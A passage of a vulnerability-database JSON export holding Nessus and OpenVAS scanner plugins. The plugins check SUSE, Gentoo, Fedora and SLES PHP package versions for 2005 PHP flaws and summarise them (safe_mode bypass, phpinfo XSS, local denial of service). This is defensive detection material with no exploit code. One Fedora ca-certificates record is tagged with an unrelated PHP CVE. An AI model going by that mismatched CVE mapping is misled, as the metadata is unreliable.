reference:\"apache2-mod_php5-5.0.4-9.6\", release:\"SUSE10.0\") )\n{\n security_warning(0);\n exit(0);\n}\nif ( rpm_check( reference:\"php4-4.4.0-6.6\", release:\"SUSE10.0\") )\n{\n security_warning(0);\n exit(0);\n}\nif ( rpm_check( reference:\"php4-exif-4.4.0-6.6\", release:\"SUSE10.0\") )\n{\n security_warning(0);\n exit(0);\n}\nif ( rpm_check( reference:\"php4-fastcgi-4.4.0-6.6\", release:\"SUSE10.0\") )\n{\n security_warning(0);\n exit(0);\n}\nif ( rpm_check( reference:\"php4-mbstring-4.4.0-6.6\", release:\"SUSE10.0\") )\n{\n security_warning(0);\n exit(0);\n}\nif ( rpm_check( reference:\"php4-servlet-4.4.0-6.6\", release:\"SUSE10.0\") )\n{\n security_warning(0);\n exit(0);\n}\nif ( rpm_check( reference:\"php5-5.0.4-9.6\", release:\"SUSE10.0\") )\n{\n security_warning(0);\n exit(0);\n}\nif ( rpm_check( reference:\"php5-exif-5.0.4-9.6\", release:\"SUSE10.0\") )\n{\n security_warning(0);\n exit(0);\n}\nif ( rpm_check( reference:\"php5-fastcgi-5.0.4-9.6\", release:\"SUSE10.0\") )\n{\n security_warning(0);\n exit(0);\n}\nif ( rpm_check( reference:\"php5-mbstring-5.0.4-9.6\", release:\"SUSE10.0\") )\n{\n security_warning(0);\n exit(0);\n}\nif ( rpm_check( reference:\"php5-pear-5.0.4-9.6\", release:\"SUSE10.0\") )\n{\n security_warning(0);\n exit(0);\n}\nif ( rpm_check( reference:\"apache2-mod_php4-4.3.3-201\", release:\"SUSE9.0\") )\n{\n security_warning(0);\n exit(0);\n}\nif ( rpm_check( reference:\"mod_php4-4.3.3-201\", release:\"SUSE9.0\") )\n{\n security_warning(0);\n exit(0);\n}\nif ( rpm_check( reference:\"mod_php4-aolserver-4.3.3-201\", release:\"SUSE9.0\") )\n{\n security_warning(0);\n exit(0);\n}\nif ( rpm_check( reference:\"mod_php4-core-4.3.3-201\", release:\"SUSE9.0\") )\n{\n security_warning(0);\n exit(0);\n}\nif ( rpm_check( reference:\"mod_php4-devel-4.3.3-201\", release:\"SUSE9.0\") )\n{\n security_warning(0);\n exit(0);\n}\nif ( rpm_check( reference:\"mod_php4-servlet-4.3.3-201\", release:\"SUSE9.0\") )\n{\n security_warning(0);\n exit(0);\n}\nif ( rpm_check( reference:\"apache2-mod_php4-4.3.4-43.46.8\", release:\"SUSE9.1\") )\n{\n security_warning(0);\n exit(0);\n}\nif ( rpm_check( reference:\"mod_php4-core-4.3.4-43.46.8\", release:\"SUSE9.1\") )\n{\n security_warning(0);\n exit(0);\n}\nif ( rpm_check( reference:\"mod_php4-servlet-4.3.4-43.46.8\", release:\"SUSE9.1\") )\n{\n security_warning(0);\n exit(0);\n}\nif ( rpm_check( reference:\"php4-4.3.4-43.46.8\", release:\"SUSE9.1\") )\n{\n security_warning(0);\n exit(0);\n}\nif ( rpm_check( reference:\"php4-devel-4.3.4-43.46.8\", release:\"SUSE9.1\") )\n{\n security_warning(0);\n exit(0);\n}\nif ( rpm_check( reference:\"php4-exif-4.3.4-43.46.8\", release:\"SUSE9.1\") )\n{\n security_warning(0);\n exit(0);\n}\nif ( rpm_check( reference:\"php4-fastcgi-4.3.4-43.46.8\", release:\"SUSE9.1\") )\n{\n security_warning(0);\n exit(0);\n}\nif ( rpm_check( reference:\"php4-imap-4.3.4-43.46.8\", release:\"SUSE9.1\") )\n{\n security_warning(0);\n exit(0);\n}\nif ( rpm_check( reference:\"php4-mbstring-4.3.4-43.46.8\", release:\"SUSE9.1\") )\n{\n security_warning(0);\n exit(0);\n}\nif ( rpm_check( reference:\"php4-mysql-4.3.4-43.46.8\", release:\"SUSE9.1\") )\n{\n security_warning(0);\n exit(0);\n}\nif ( rpm_check( reference:\"php4-pear-4.3.4-43.46.8\", release:\"SUSE9.1\") )\n{\n security_warning(0);\n exit(0);\n}\nif ( rpm_check( reference:\"php4-recode-4.3.4-43.46.8\", release:\"SUSE9.1\") )\n{\n security_warning(0);\n exit(0);\n}\nif ( rpm_check( reference:\"php4-servlet-4.3.4-43.46.8\", release:\"SUSE9.1\") )\n{\n security_warning(0);\n exit(0);\n}\nif ( rpm_check( reference:\"php4-session-4.3.4-43.46.8\", release:\"SUSE9.1\") )\n{\n security_warning(0);\n exit(0);\n}\nif ( rpm_check( reference:\"php4-sysvshm-4.3.4-43.46.8\", release:\"SUSE9.1\") )\n{\n security_warning(0);\n exit(0);\n}\nif ( rpm_check( reference:\"php4-wddx-4.3.4-43.46.8\", release:\"SUSE9.1\") )\n{\n security_warning(0);\n exit(0);\n}\nif ( rpm_check( reference:\"apache2-mod_php4-4.3.8-8.19\", release:\"SUSE9.2\") )\n{\n security_warning(0);\n exit(0);\n}\nif ( rpm_check( reference:\"mod_php4-servlet-4.3.8-8.19\", release:\"SUSE9.2\") )\n{\n security_warning(0);\n exit(0);\n}\nif ( rpm_check( reference:\"php4-4.3.8-8.19\", release:\"SUSE9.2\") )\n{\n security_warning(0);\n exit(0);\n}\nif ( rpm_check( reference:\"php4-devel-4.3.8-8.19\", release:\"SUSE9.2\") )\n{\n security_warning(0);\n exit(0);\n}\nif ( rpm_check( reference:\"php4-exif-4.3.8-8.19\", release:\"SUSE9.2\") )\n{\n security_warning(0);\n exit(0);\n}\nif ( rpm_check( reference:\"php4-fastcgi-4.3.8-8.19\", release:\"SUSE9.2\") )\n{\n security_warning(0);\n exit(0);\n}\nif ( rpm_check( reference:\"php4-mbstring-4.3.8-8.19\", release:\"SUSE9.2\") )\n{\n security_warning(0);\n exit(0);\n}\nif ( rpm_check( reference:\"php4-pear-4.3.8-8.19\", release:\"SUSE9.2\") )\n{\n security_warning(0);\n exit(0);\n}\nif ( rpm_check( reference:\"php4-session-4.3.8-8.19\", release:\"SUSE9.2\") )\n{\n security_warning(0);\n exit(0);\n}\nif ( rpm_check( reference:\"php4-sysvshm-4.3.8-8.19\", release:\"SUSE9.2\") )\n{\n security_warning(0);\n exit(0);\n}\nif ( rpm_check( reference:\"apache2-mod_php4-4.3.10-14.16\", release:\"SUSE9.3\") )\n{\n security_warning(0);\n exit(0);\n}\nif ( rpm_check( reference:\"apache2-mod_php5-5.0.3-14.16\", release:\"SUSE9.3\") )\n{\n security_warning(0);\n exit(0);\n}\nif ( rpm_check( reference:\"mod_php4-servlet-4.3.10-14.16\", release:\"SUSE9.3\") )\n{\n security_warning(0);\n exit(0);\n}\nif ( rpm_check( reference:\"php4-4.3.10-14.16\", release:\"SUSE9.3\") )\n{\n security_warning(0);\n exit(0);\n}\nif ( rpm_check( reference:\"php4-devel-4.3.10-14.16\", release:\"SUSE9.3\") )\n{\n security_warning(0);\n exit(0);\n}\nif ( rpm_check( reference:\"php4-exif-4.3.10-14.16\", release:\"SUSE9.3\") )\n{\n security_warning(0);\n exit(0);\n}\nif ( rpm_check( reference:\"php4-fastcgi-4.3.10-14.16\", release:\"SUSE9.3\") )\n{\n security_warning(0);\n exit(0);\n}\nif ( rpm_check( reference:\"php4-mbstring-4.3.10-14.16\", release:\"SUSE9.3\") )\n{\n security_warning(0);\n exit(0);\n}\nif ( rpm_check( reference:\"php4-pear-4.3.10-14.16\", release:\"SUSE9.3\") )\n{\n security_warning(0);\n exit(0);\n}\nif ( rpm_check( reference:\"php4-session-4.3.10-14.16\", release:\"SUSE9.3\") )\n{\n security_warning(0);\n exit(0);\n}\nif ( rpm_check( reference:\"php4-sysvshm-4.3.10-14.16\", release:\"SUSE9.3\") )\n{\n security_warning(0);\n exit(0);\n}\nif ( rpm_check( reference:\"php5-5.0.3-14.16\", release:\"SUSE9.3\") )\n{\n security_warning(0);\n exit(0);\n}\nif ( rpm_check( reference:\"php5-devel-5.0.3-14.16\", release:\"SUSE9.3\") )\n{\n security_warning(0);\n exit(0);\n}\nif ( rpm_check( reference:\"php5-exif-5.0.3-14.16\", release:\"SUSE9.3\") )\n{\n security_warning(0);\n exit(0);\n}\nif ( rpm_check( reference:\"php5-fastcgi-5.0.3-14.16\", release:\"SUSE9.3\") )\n{\n security_warning(0);\n exit(0);\n}\nif ( rpm_check( reference:\"php5-mbstring-5.0.3-14.16\", release:\"SUSE9.3\") )\n{\n security_warning(0);\n exit(0);\n}\nif ( rpm_check( reference:\"php5-pear-5.0.3-14.16\", release:\"SUSE9.3\") )\n{\n security_warning(0);\n exit(0);\n}\nif ( rpm_check( reference:\"php5-sysvmsg-5.0.3-14.16\", release:\"SUSE9.3\") )\n{\n security_warning(0);\n exit(0);\n}\nif ( rpm_check( reference:\"php5-sysvshm-5.0.3-14.16\", release:\"SUSE9.3\") )\n{\n security_warning(0);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-07T10:52:00", "description": "The remote host is affected by the vulnerability described in GLSA-200511-08\n(PHP: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been found and fixed in PHP:\n a possible $GLOBALS variable overwrite problem through file\n upload handling, extract() and import_request_variables()\n (CVE-2005-3390)\n a local Denial of Service through the use of\n the session.save_path option (CVE-2005-3319)\n an issue with\n trailing slashes in allowed basedirs (CVE-2005-3054)\n an issue\n with calling virtual() on Apache 2, allowing to bypass safe_mode and\n open_basedir restrictions (CVE-2005-3392)\n a problem when a\n request was terminated due to memory_limit constraints during certain\n parse_str() calls (CVE-2005-3389)\n The curl and gd modules\n allowed to bypass the safe mode open_basedir restrictions\n (CVE-2005-3391)\n a cross-site scripting (XSS) vulnerability in\n phpinfo() (CVE-2005-3388)\n \nImpact :\n\n Attackers could leverage these issues to exploit applications that\n are assumed to be secure through the use of proper register_globals,\n safe_mode or open_basedir parameters. Remote attackers could also\n conduct cross-site scripting attacks if a page calling phpinfo() was\n available. Finally, a local attacker could cause a local Denial of\n Service using malicious session.save_path options.\n \nWorkaround :\n\n There is no known workaround that would solve all issues at this\n time.", "edition": 24, "published": "2005-11-15T00:00:00", "title": "GLSA-200511-08 : PHP: Multiple vulnerabilities", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2005-3388", "CVE-2005-3392", "CVE-2005-3054", "CVE-2005-3389", "CVE-2005-3319", "CVE-2005-3391", "CVE-2005-3390"], "modified": "2005-11-15T00:00:00", "cpe": ["p-cpe:/a:gentoo:linux:php-cgi", "cpe:/o:gentoo:linux", "p-cpe:/a:gentoo:linux:php", "p-cpe:/a:gentoo:linux:mod_php"], "id": "GENTOO_GLSA-200511-08.NASL", "href": "https://www.tenable.com/plugins/nessus/20195", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 200511-08.\n#\n# The advisory text is Copyright (C) 2001-2015 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(20195);\n script_version(\"1.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2005-3054\", \"CVE-2005-3319\", \"CVE-2005-3388\", \"CVE-2005-3389\", \"CVE-2005-3390\", \"CVE-2005-3391\", \"CVE-2005-3392\");\n script_xref(name:\"GLSA\", value:\"200511-08\");\n\n script_name(english:\"GLSA-200511-08 : PHP: Multiple vulnerabilities\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-200511-08\n(PHP: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been found and fixed in PHP:\n a possible $GLOBALS variable overwrite problem through file\n upload handling, extract() and import_request_variables()\n (CVE-2005-3390)\n a local Denial of Service through the use of\n the session.save_path option (CVE-2005-3319)\n an issue with\n trailing slashes in allowed basedirs (CVE-2005-3054)\n an issue\n with calling virtual() on Apache 2, allowing to bypass safe_mode and\n open_basedir restrictions (CVE-2005-3392)\n a problem when a\n request was terminated due to memory_limit constraints during certain\n parse_str() calls (CVE-2005-3389)\n The curl and gd modules\n allowed to bypass the safe mode open_basedir restrictions\n (CVE-2005-3391)\n a cross-site scripting (XSS) vulnerability in\n phpinfo() (CVE-2005-3388)\n \nImpact :\n\n Attackers could leverage these issues to exploit applications that\n are assumed to be secure through the use of proper register_globals,\n safe_mode or open_basedir parameters. Remote attackers could also\n conduct cross-site scripting attacks if a page calling phpinfo() was\n available. Finally, a local attacker could cause a local Denial of\n Service using malicious session.save_path options.\n \nWorkaround :\n\n There is no known workaround that would solve all issues at this\n time.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/200511-08\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"All PHP users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose dev-php/php\n All mod_php users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose dev-php/mod_php\n All php-cgi users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose dev-php/php-cgi\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:mod_php\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:php\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:php-cgi\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2005/11/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2005/11/15\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2005/10/31\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2005-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"dev-php/php-cgi\", unaffected:make_list(\"rge 4.3.11-r5\", \"ge 4.4.0-r5\"), vulnerable:make_list(\"lt 4.4.0-r5\"))) flag++;\nif (qpkg_check(package:\"dev-php/php\", unaffected:make_list(\"rge 4.3.11-r4\", \"ge 4.4.0-r4\"), vulnerable:make_list(\"lt 4.4.0-r4\"))) flag++;\nif (qpkg_check(package:\"dev-php/mod_php\", unaffected:make_list(\"rge 4.3.11-r4\", \"ge 4.4.0-r8\"), vulnerable:make_list(\"lt 4.4.0-r8\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:qpkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"PHP\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-09-25T06:32:01", "description": "updates the mozilla certificate list, removes expired certificates.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.", "edition": 4, "cvss3": {}, "published": "2020-06-23T00:00:00", "title": "Fedora 32 : ca-certificates (2020-fb144e7de5)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2005-3388"], "modified": "2020-06-23T00:00:00", "cpe": ["cpe:/o:fedoraproject:fedora:32", "p-cpe:/a:fedoraproject:fedora:ca-certificates"], "id": "FEDORA_2020-FB144E7DE5.NASL", "href": "https://www.tenable.com/plugins/nessus/137737", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2020-fb144e7de5.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(137737);\n script_version(\"1.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/09/24\");\n\n script_cve_id(\"CVE-2005-3388\");\n script_xref(name:\"FEDORA\", value:\"2020-fb144e7de5\");\n\n script_name(english:\"Fedora 32 : ca-certificates (2020-fb144e7de5)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"updates the mozilla certificate list, removes expired certificates.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2020-fb144e7de5\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\"Update the affected ca-certificates package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2005-3388\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:ca-certificates\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:32\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2005/11/01\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/06/23\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/06/23\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^32([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 32\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC32\", reference:\"ca-certificates-2020.2.41-1.1.fc32\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"ca-certificates\");\n}\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "openvas": [{"lastseen": "2017-07-26T08:56:07", "bulletinFamily": "scanner", "cvelist": ["CVE-2005-3353", "CVE-2005-3389", "CVE-2005-3390"], "description": "The remote host is missing updates to packages that affect\nthe security of your system. One or more of the following packages\nare affected:\n\n mod_php4-core\n php4-session\n php4\n php4-imap\n apache-mod_php4\n php4-servlet\n php4-sysvshm\n mod_php4-servlet\n php4-mysql\n php4-pear\n php4-fastcgi\n php4-exif\n php4-devel\n apache2-mod_php4\n\nFor more information, please visit the referenced security\nadvisories.\n\nMore details may also be found by searching for keyword\n5010771 within the SuSE Enterprise Server 9 patch\ndatabase at http://download.novell.com/patch/finder/", "modified": "2017-07-11T00:00:00", "published": "2009-10-10T00:00:00", "id": "OPENVAS:65242", "href": "http://plugins.openvas.org/nasl.php?oid=65242", "type": "openvas", "title": "SLES9: Security update for PHP4", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: sles9p5010771.nasl 6666 2017-07-11 13:13:36Z cfischer $\n# Description: Security update for PHP4\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_summary = \"The remote host is missing updates to packages that affect\nthe security of your system. One or more of the following packages\nare affected:\n\n mod_php4-core\n php4-session\n php4\n php4-imap\n apache-mod_php4\n php4-servlet\n php4-sysvshm\n mod_php4-servlet\n php4-mysql\n php4-pear\n php4-fastcgi\n php4-exif\n php4-devel\n apache2-mod_php4\n\nFor more information, please visit the referenced security\nadvisories.\n\nMore details may also be found by searching for keyword\n5010771 within the SuSE Enterprise Server 9 patch\ndatabase at http://download.novell.com/patch/finder/\";\n\ntag_solution = \"Please install the updates provided by SuSE.\";\n \nif(description)\n{\n script_id(65242);\n script_version(\"$Revision: 6666 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-11 15:13:36 +0200 (Tue, 11 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-10-10 16:11:46 +0200 (Sat, 10 Oct 2009)\");\n script_cve_id(\"CVE-2005-3353\", \"CVE-2005-3389\", \"CVE-2005-3390\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"SLES9: Security update for PHP4\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse_sles\", \"ssh/login/rpms\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"mod_php4-core\", rpm:\"mod_php4-core~4.3.4~43.46.3\", rls:\"SLES9.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-04-06T11:40:00", "bulletinFamily": "scanner", "cvelist": ["CVE-2005-3353", "CVE-2005-3389", "CVE-2005-3390"], "description": "The remote host is missing updates to packages that affect\nthe security of your system. One or more of the following packages\nare affected:\n\n mod_php4-core\n php4-session\n php4\n php4-imap\n apache-mod_php4\n php4-servlet\n php4-sysvshm\n mod_php4-servlet\n php4-mysql\n php4-pear\n php4-fastcgi\n php4-exif\n php4-devel\n apache2-mod_php4\n\nFor more information, please visit the referenced security\nadvisories.\n\nMore details may also be found by searching for keyword\n5010771 within the SuSE Enterprise Server 9 patch\ndatabase at http://download.novell.com/patch/finder/", "modified": "2018-04-06T00:00:00", "published": "2009-10-10T00:00:00", "id": "OPENVAS:136141256231065242", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231065242", "type": "openvas", "title": "SLES9: Security update for PHP4", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: sles9p5010771.nasl 9350 2018-04-06 07:03:33Z cfischer $\n# Description: Security update for PHP4\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_summary = \"The remote host is missing updates to packages that affect\nthe security of your system. One or more of the following packages\nare affected:\n\n mod_php4-core\n php4-session\n php4\n php4-imap\n apache-mod_php4\n php4-servlet\n php4-sysvshm\n mod_php4-servlet\n php4-mysql\n php4-pear\n php4-fastcgi\n php4-exif\n php4-devel\n apache2-mod_php4\n\nFor more information, please visit the referenced security\nadvisories.\n\nMore details may also be found by searching for keyword\n5010771 within the SuSE Enterprise Server 9 patch\ndatabase at http://download.novell.com/patch/finder/\";\n\ntag_solution = \"Please install the updates provided by SuSE.\";\n \nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.65242\");\n script_version(\"$Revision: 9350 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-10-10 16:11:46 +0200 (Sat, 10 Oct 2009)\");\n script_cve_id(\"CVE-2005-3353\", \"CVE-2005-3389\", \"CVE-2005-3390\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"SLES9: Security update for PHP4\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse_sles\", \"ssh/login/rpms\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"mod_php4-core\", rpm:\"mod_php4-core~4.3.4~43.46.3\", rls:\"SLES9.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-07-02T21:10:22", "bulletinFamily": "scanner", "cvelist": ["CVE-2005-3353", "CVE-2005-3388", "CVE-2005-3392", "CVE-2005-3389", "CVE-2005-3319", "CVE-2005-3391", "CVE-2005-3390", "CVE-2005-2491"], "description": "The remote host is missing an update to the system\nas announced in the referenced advisory.", "modified": "2016-09-22T00:00:00", "published": "2008-09-04T00:00:00", "id": "OPENVAS:55777", "href": "http://plugins.openvas.org/nasl.php?oid=55777", "type": "openvas", "title": "PHP -- multiple vulnerabilities", "sourceData": "#\n#VID 6821a2db-4ab7-11da-932d-00055d790c25\n# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from vuxml or 